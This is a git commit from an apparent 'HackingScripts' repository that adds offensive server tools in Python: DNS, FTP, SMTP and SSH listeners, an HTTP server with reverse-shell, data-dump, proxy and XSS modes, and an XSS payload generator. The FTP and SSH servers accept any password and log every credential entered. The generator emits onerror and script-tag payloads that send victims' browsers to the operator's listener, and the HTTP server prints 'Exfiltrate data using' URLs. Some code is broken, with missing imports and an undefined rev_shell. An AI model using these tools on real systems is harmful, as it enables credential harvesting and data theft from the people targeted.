Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Repository restructuring

Browse Source
This commit is contained in:
Roman Hergenreder
2026-04-30 19:53:18 +02:00
parent 31af1f4423
commit f233fe8264
98 changed files with 4216 additions and 1392 deletions
Download Patch File Download Diff File Expand all files Collapse all files

145
tools/server/dnsserver.py Executable file
View File

@@ -0,0 +1,145 @@
#!/usr/bin/env python
# coding=utf-8
import argparse
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
try:
from dnslib import *
except ImportError:
print("Missing dependency dnslib: <https://pypi.python.org/pypi/dnslib>. Please install it with `pip`.")
sys.exit(2)
class DnsServer:
class BaseRequestHandler(socketserver.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
try:
data = self.get_data()
self.send_data(self.server.server.dns_response(data))
except Exception:
traceback.print_exc(file=sys.stderr)
class TCPReqImpl(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = struct.unpack('>H', data[:2])[0]
if sz < len(data) - 2:
raise Exception("Wrong size of TCP packet")
elif sz > len(data) - 2:
raise Exception("Too big TCP packet")
return data[2:]
def send_data(self, data):
sz = struct.pack('>H', len(data))
return self.request.sendall(sz + data)
class UDPReqImpl(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
class UDPImpl(socketserver.ThreadingUDPServer):
def __init__(self, server):
super().__init__((server.bind_addr, server.listen_port), DnsServer.UDPReqImpl)
self.server = server
class TCPImpl(socketserver.ThreadingTCPServer):
def __init__(self, server):
super().__init__((server.bind_addr, server.listen_port), DnsServer.TCPReqImpl)
self.server = server
def __init__(self, addr, port=53):
self.bind_addr = addr
self.listen_port = port
self.sockets = []
self.threads = []
self.sockets.append(DnsServer.UDPImpl(self))
self.sockets.append(DnsServer.TCPImpl(self))
self.entries = { "A": {}, "AAAA": {}, "MX": {}, "TXT": {}, "NS": {} }
self.debug = False
self.ttl = 60 * 5
self.logging = False
self.not_found_handler = None
def addEntry(self, type, domain, value):
if type not in self.entries:
print("Invalid type, must be one of:", self.entries.keys())
return False
if not domain.endswith("."):
domain += "."
if type in ["A","MX","NS"]:
value = A(value)
elif type in ["AAAA"]:
value = AAAA(value)
elif type in ["TXT"]:
value = CNAME(value)
if self.debug:
print(f"Added entry: {type} {domain} => {value}")
self.entries[type][domain] = value
return True
def startBackground(self):
for socket in self.sockets:
t = threading.Thread(target=socket.serve_forever)
t.start()
self.threads.append(t)
def start(self):
self.startBackground()
map(lambda t: t.join(), self.threads)
def stop(self):
map(lambda s: s.shutdown(), self.sockets)
map(lambda t: t.join(), self.threads)
def dns_response(self, data):
request = DNSRecord.parse(data)
if self.debug:
print("DNS REQUEST:", request)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
if qt in self.entries and qn in self.entries[qt]:
entry = self.entries[qt][qn]
rqt = entry.__class__.__name__
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=self.ttl, rdata=entry))
if self.logging:
print(f"Request: {qt} {qn} -> {entry}")
elif self.not_found_handler:
self.not_found_handler(request, reply)
if self.debug:
print("DNS RESPONSE:", reply)
return reply.pack()

181
tools/server/ftpserver.py Executable file
View File

@@ -0,0 +1,181 @@
import os
import logging
import argparse
import signal
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import ThreadedFTPServer
from pyftpdlib.authorizers import DummyAuthorizer
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(message)s")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
MSG_LOGIN = "Login successful"
MSG_CLOSE = "Goodbye"
# Class to log every action the user takes
class CustomFTPHandler(FTPHandler):
def on_login(self, username):
logging.info(f"User '{username}' logged in successfully.")
def on_login_failed(self, username, password):
logging.warning(
f"Failed login attempt for user '{username}' with password '{password}'."
)
def on_file_received(self, file):
logging.info(f"File received: {file}")
def on_file_sent(self, file):
logging.info(f"File sent: {file}")
def on_file_deleted(self, file):
logging.info(f"File deleted: {file}")
def on_file_renamed(self, old_file, new_file):
logging.info(f"File renamed from '{old_file}' to '{new_file}'")
def on_file_downloaded(self, file):
logging.info(f"File downloaded: {file}")
def on_file_stored(self, file):
logging.info(f"File stored: {file}")
def on_file_retrieved(self, file):
logging.info(f"File retrieved: {file}")
def on_file_aborted(self, file):
logging.info(f"File transfer aborted: {file}")
def on_file_changed(self, file):
logging.info(f"File changed: {file}")
def on_file_moved(self, old_file, new_file):
logging.info(f"File moved from '{old_file}' to '{new_file}'")
def on_file_uploaded(self, file):
logging.info(f"File uploaded: {file}")
def on_connect(self):
logger.info(f"Client connected: {self.remote_ip}")
def on_disconnect(self):
logger.info(f"Client disconnected: {self.remote_ip}")
def on_logout(self, username):
logger.info(f"User logged out: {username}")
def on_incomplete_file_received(self, file):
logger.warning(f"Incomplete file received: {file}")
def on_incomplete_file_sent(self, file):
logger.warning(f"Incomplete file received: {file}")
class AnyUserAuthorizer(DummyAuthorizer):
"""
Authorization class that allows any combination of username/password.
"""
def __init__(self, directory):
DummyAuthorizer.__init__(self)
self.directory = directory
self.default_params = {
"pwd": "",
"home": self.directory,
"perm": "elr",
"operms": {},
"msg_login": MSG_LOGIN,
"msg_quit": MSG_CLOSE,
}
def validate_authentication(self, username, password, handler):
logger.info(f"User '{username}' tried logging in with password: '{password}'")
return True
def get_home_dir(self, username):
return self.directory
def has_user(self, username):
if username in self.user_table:
return True
self.add_user(username, "", self.directory)
return True
def has_perm(self, username, perm, path=None) -> bool:
if username not in self.user_table:
# add user manually and not via add_user due to infinite recursion
self.user_table[username] = self.default_params
return True
def get_msg_login(self, username: str) -> str:
return MSG_LOGIN
def get_msg_quit(self, username: str) -> str:
return MSG_CLOSE
class FastFTPServer:
def __init__(self, directory, port):
self.directory = directory
self.port = port
self.server = None
def start(self):
authorizer = AnyUserAuthorizer(directory=self.directory)
handler = CustomFTPHandler
handler.authorizer = authorizer
self.server = ThreadedFTPServer(("", self.port), handler)
logging.info(f"Starting FTP server on port {self.port}")
self.server.serve_forever()
def cleanup(self):
logging.info("Shutting down FTP server...")
if self.server:
self.server.close_all()
logging.info("FTP server shut down.")
def signal_handler(sig, frame):
logging.info("Received Ctrl+C, shutting down...")
ftp_server.cleanup()
exit(0)
def main():
parser = argparse.ArgumentParser(description="Temporary FTP Server")
parser.add_argument(
"--dir", "-d", type=str, default=".", help="Directory to serve files from"
)
parser.add_argument(
"--port", "-p", type=int, default=21, help="Port to run the FTP server on"
)
args = parser.parse_args()
if not os.path.exists(args.dir):
print(f"Error: The directory '{args.dir}' does not exist.")
return
global ftp_server
ftp_server = FastFTPServer(args.dir, args.port)
signal.signal(signal.SIGINT, signal_handler)
ftp_server.start()
if __name__ == "__main__":
main()

40
tools/server/smtpserver.py Executable file
View File

@@ -0,0 +1,40 @@
import smtpd
import email
import asyncore
import threading
class SMTPServer(smtpd.SMTPServer):
def __init__(self, addr='0.0.0.0', port=25):
super().__init__((addr, port), None)
self.listen_thread = None
self.verbose = False
self.on_message = None
self.is_running = True
def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
if self.verbose:
print(f"SMTP IN: {peer=} {mailfrom=} {rcpttos=} {len(data)} bytes, extra:", kwargs)
if self.on_message and callable(self.on_message):
mail = email.message_from_bytes(data)
self.on_message(peer, mailfrom, rcpttos, mail)
def start(self):
if self.verbose:
print(f"SMTP server running on: {self._localaddr[0]}:{self._localaddr[1]}")
try:
while self.is_running:
asyncore.loop(timeout=1, use_poll=True)
except KeyboardInterrupt:
self.close()
def start_background(self):
self.listen_thread = threading.Thread(target=self.start)
self.listen_thread.start()
return self.listen_thread
def stop(self):
self.is_running = False
self.close()
if self.listen_thread:
self.listen_thread.join()

90
tools/server/sshserver.py Executable file
View File

@@ -0,0 +1,90 @@
import socket
import select
import threading
import paramiko
class ParamikoConnection(paramiko.ServerInterface):
def __init__(self, server):
self.event = threading.Event()
self.server = server
def check_channel_request(self, kind, chanid):
print("check_channel_request", kind, chanid)
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if self.server.on_ssh_login:
return self.server.on_ssh_login(username, password)
print("check_auth_password", username, password)
return paramiko.AUTH_SUCCESSFUL
class SSHServer:
def __init__(self, addr='0.0.0.0', port=22):
self.server_address = addr
self.listen_port = port
self.listen_socket = None
self.listen_thread = None
self.client_sockets = []
self.transports = []
self.verbose = True
self.on_message = None
self.is_running = True
self.private_key = None
# hooks
self.on_ssh_login = None
def load_private_key_from_file(self, path):
with open(path, "r") as f:
self.private_key = paramiko.RSAKey.from_private_key(f)
def start(self):
if self.private_key is None:
self.private_key = paramiko.RSAKey.generate(2048)
self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_socket.setblocking(False)
self.listen_socket.bind((self.server_address, self.listen_port))
self.listen_socket.listen()
if self.verbose:
print(f"SSH server running on: {self.server_address}:{self.listen_port}")
try:
while self.is_running:
try:
client_socket, client_address = self.listen_socket.accept()
if self.verbose:
print("Incoming connection:", client_address)
self.client_sockets.append(client_socket)
transport = paramiko.Transport(client_socket)
transport.add_server_key(self.private_key)
paramiko_connection = ParamikoConnection(self)
transport.start_server(server=paramiko_connection)
self.transports.append(transport)
except BlockingIOError:
pass
finally:
self.listen_socket.close()
def start_background(self):
self.listen_thread = threading.Thread(target=self.start)
self.listen_thread.start()
return self.listen_thread
def close(self):
if self.listen_socket:
self.listen_socket.shutdown(socket.SHUT_RDWR)
for sock in self.client_sockets:
sock.close()
def stop(self):
self.is_running = False
self.close()
if self.listen_thread:
self.listen_thread.join()

372
tools/server/webserver.py Executable file
View File

@@ -0,0 +1,372 @@
#!/usr/bin/env python
import argparse
import threading
import requests
import time
import os
import ssl
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse
from hackingscripts.utils import util
from hackingscripts.tools.server.xss_handler import generate_payload as generate_xss_payload
class FileServerRequestHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_HEAD(self):
self.do_GET()
def do_POST(self):
self.do_GET()
def onForward(self, base_path, target, **kwargs):
path = self.path[max(0, len(base_path)-1):]
parts = urlparse(target)
if path.startswith(parts.path):
path = path[len(parts.path):]
target_rewrite = target + path
# queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
# if queryStr:
# target += "?" if "?" not in target else "&"
# target += queryStr
content_length = self.headers.get('Content-Length')
data = None
if content_length and int(content_length) > 0:
data = self.rfile.read(int(content_length))
if "Host" in self.headers:
del self.headers["Host"]
method = self.command
print(target, "=>", method, target_rewrite)
res = requests.request(method, target_rewrite, headers=self.headers, data=data, **kwargs)
return res.status_code, res.content, res.headers
def read_body(self):
if not hasattr(self, "body"):
content_length = self.headers.get('Content-Length')
if content_length and int(content_length) > 0:
self.body = self.rfile.read(int(content_length))
else:
self.body = None
return self.body
def find_route(self, path):
if path in self.server.routes:
return self.server.routes[path]
for p, route in self.server.prefix_routes.items():
if path.startswith(p):
return route
def not_found(req):
return 404, b"", {}
return not_found
def do_OPTIONS(self):
self.do_GET()
def do_GET(self):
try:
if not self.server.is_running:
self.send_response(200)
self.end_headers()
return
path = self.server.cleanPath(self.path)
route = self.find_route(path)
result = route(self)
blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]
if isinstance(result, tuple):
status_code = 200 if len(result) < 1 else result[0]
data = b"" if len(result) < 2 else result[1]
headers = { } if len(result) < 3 else result[2]
elif isinstance(result, int):
status_code = result
data = b""
headers = {}
elif result is None:
status_code = 201
data = b""
headers = {}
else:
status_code = 200
data = data if type(data) in [bytes, bytearray] else str(data).encode()
headers = {}
if path in self.server.dumpRequests:
headers["Access-Control-Allow-Origin"] = "*"
headers["Connection"] = "Close"
headers["Content-Length"] = len(util.nvl(data, b""))
if len(headers) == 0:
self.send_response(status_code)
else:
if path != "/dummy":
self.log_request(status_code)
self.send_response_only(status_code)
for key, value in headers.items():
if key.lower() not in blacklist_headers:
self.send_header(key, value)
if self.command.upper() == "OPTIONS":
self.send_header("Allow", "OPTIONS, GET, HEAD, POST")
self.end_headers()
if data and self.command.upper() not in ["HEAD","OPTIONS"]:
if isinstance(data, str):
data = data.encode()
self.wfile.write(data)
if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
body = self.read_body()
print("===== Connection from:",self.client_address[0])
print("%s %s %s" % (self.command, self.path, self.request_version))
print(str(self.headers).strip())
if body:
print()
print(body)
print("==========")
except Exception as e:
print("Exception on handling http", str(e))
raise e
def log_message(self, format, *args):
if self.server.logRequests:
super().log_message(format, *args)
class HttpFileServer(HTTPServer):
def __init__(self, addr, port):
super().__init__((addr, port), FileServerRequestHandler)
self.ssl_context = None
self.logRequests = False
self.routes = { }
self.dumpRequests = []
self.prefix_routes = { }
self.is_running = True
self.listen_thread = None
def cleanPath(self, path):
if "?" in path:
path = path[0:path.find("?")]
if not path.startswith("/"):
path = "/" + path
return path.strip()
def addFile(self, name, data, mime_type=None):
assert isinstance(name, str)
assert data is not None
if hasattr(data, "read"):
fd = data
data = data.read()
fd.close()
if isinstance(data, str):
data = data.encode("UTF-8")
headers = {
"Access-Control-Allow-Origin": "*"
}
if mime_type:
headers["Content-Type"] = mime_type
# return 200 - OK and data
self.addRoute(name, lambda req: (200, data, headers))
def add_file_path(self, path, name=None):
def readfile():
with open(path, "rb") as f:
return f.read()
if name is None:
name = os.path.basename(path)
self.addRoute(name, lambda req: (200, readfile()))
def load_directory(self, path, recursive=True, exclude_ext=[]):
if not os.path.isdir(path):
print("Not a directory:", path)
return
for dp, dn, filenames in os.walk(path):
for f in filenames:
file_path = os.path.join(dp, f)
if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
relative_path = file_path[len(path):]
self.add_file_path(file_path, relative_path)
def dumpRequest(self, name):
self.dumpRequests.append(self.cleanPath(name))
def addRoute(self, path, func):
self.routes[self.cleanPath(path)] = func
def addPrefixRoute(self, path, func):
self.prefix_routes[self.cleanPath(path)] = func
def forwardRequest(self, path, target, **kwargs):
self.addPrefixRoute(path, lambda req: req.onForward(path, target, **kwargs))
def enableLogging(self):
self.logRequests = True
def enableSSL(self, private_key="private.key", certificate="server.crt"):
if not os.path.isfile(private_key):
print("Generating private key and certificate…")
os.system(f"openssl req -new -x509 -keyout {private_key} -out {certificate} -days 365 -nodes")
elif not os.path.isfile(certificate):
print("Generating certificate…")
os.system(f"openssl req -new -x509 -keyin {private_key} -out {certificate} -days 365 -nodes")
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.ssl_context.load_cert_chain(certificate, private_key)
self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)
def startBackground(self):
self.listen_thread = threading.Thread(target=self.serve_forever)
self.listen_thread.start()
return self.listen_thread
def get_base_url(self, ip_addr=None):
addr, port = self.server_address
if ip_addr is not None:
addr = ip_addr
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
if (int(port) == 80 and protocol == "http") or (int(port) == 443 and protocol == "https"):
port = ""
else:
port = f":{port}"
return f"{protocol}://{addr}{port}"
def get_full_url(self, uri, ip_addr=None):
if not uri.startswith("/"):
uri = "/" + uri
return self.get_base_url(ip_addr) + uri
def stop(self):
self.is_running = False
time.sleep(1)
self.shutdown()
if self.listen_thread != threading.currentThread():
self.listen_thread.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Spawn a temporary http server")
parser.add_argument(
"action",
choices=["shell", "dump", "proxy", "xss", "start"],
help="Choose one of these actions: shell, dump, proxy, xss, start"
)
parser.add_argument(
"--bind-address",
type=str,
default="0.0.0.0",
dest="bind_addr",
help="Address to bind on (default: 0.0.0.0)"
)
parser.add_argument(
"--port",
type=int,
default=9000,
help="Port to bind on (default: 9000)"
)
parser.add_argument(
"--payload",
type=str,
default=None,
help="Payload for xss / shell"
)
parser.add_argument(
"--ssl",
action="store_true",
default=False,
help="Use HTTPS instead of HTTP"
)
parser.add_argument(
"--ssl-cert",
dest="ssl_cert",
type=str,
default="server.crt",
help="The certificate to use in combination with --ssl, default: server.crt"
)
parser.add_argument(
"--ssl-key",
dest="ssl_key",
type=str,
default="private.key",
help="The private key to use in combination with --ssl, default: private.key"
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
default=False,
help="Verbose mode"
)
args = parser.parse_args()
file_server = HttpFileServer(args.bind_addr, args.port)
ip_address = util.get_address()
if args.ssl:
file_server.enableSSL(args.ssl_key, args.ssl_cert)
if args.verbose:
file_server.enableLogging()
if args.action == "shell":
payload_type = args.payload if args.payload else "bash"
shell_payload = rev_shell.generate_payload(args.payload, ip_address, 4444)
file_server.addFile("/shell", rev_shell)
print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
elif args.action == "dump":
file_server.dumpRequest("/")
print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
elif args.action == "proxy":
url = "https://google.com"
file_server.forwardRequest("/proxy", url)
print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
elif args.action == "xss":
payload_type = args.payload if args.payload else "img"
xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address))
file_server.addFile("/xss", xss)
file_server.dumpRequest("/exfiltrate")
print("Exfiltrate data using:")
print(xss)
elif args.action == "start":
file_server.load_directory(".")
print("Serve files in current directory using:")
print(file_server.get_full_url("/", ip_addr=ip_address))
file_server.serve_forever()

71
tools/server/xss_handler.py Executable file
View File

@@ -0,0 +1,71 @@
#!/usr/bin/env python
from hackingscripts import util
from fileserver import HttpFileServer
import argparse
import random
def generate_payload(payload_type, url, index=None, **kwargs):
payloads = []
media_tags = ["img","audio","video","image","body","script","object"]
if payload_type in media_tags:
payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url))
if payload_type == "script":
payloads.append('<script type="text/javascript">document.location=%s</script>' % url)
payloads.append('<script src="%s/xss" />' % url)
if len(payloads) == 0:
return None
return "\n".join(payloads)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="XSS payload generator")
parser.add_argument(dest="type", type=str, default=None, help="Payload type")
parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
args, extra = parser.parse_known_args()
listen_port = args.port
payload_type = args.type.lower()
local_address = args.addr
extra_args = {}
for entry in extra:
match = re.match(r"(\w+)=(\w+)", entry)
if not match:
print("Invalid extra argument:", entry)
exit()
key, value = match.groups()
extra_args[key] = value
# choose random port
if listen_port is None:
listen_port = random.randint(10000,65535)
while util.is_port_in_use(listen_port):
listen_port = random.randint(10000,65535)
http_server = HttpFileServer(local_address, listen_port)
payload_type = args.type.lower()
url = http_server.get_full_url("/", util.get_address())
payload = generate_payload(payload_type, url, **extra_args)
if payload is None:
print("Unknown payload type: %s" % payload_type)
# print("Supported types: ")
exit(1)
print(f"---PAYLOAD---\n{payload}\n---PAYLOAD---\n")
headers = {
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Methods": "GET, POST, OPTIONS"
}
http_server.addRoute("/", lambda req: (201, b"", headers))
http_server.dumpRequest("/")
http_server.serve_forever()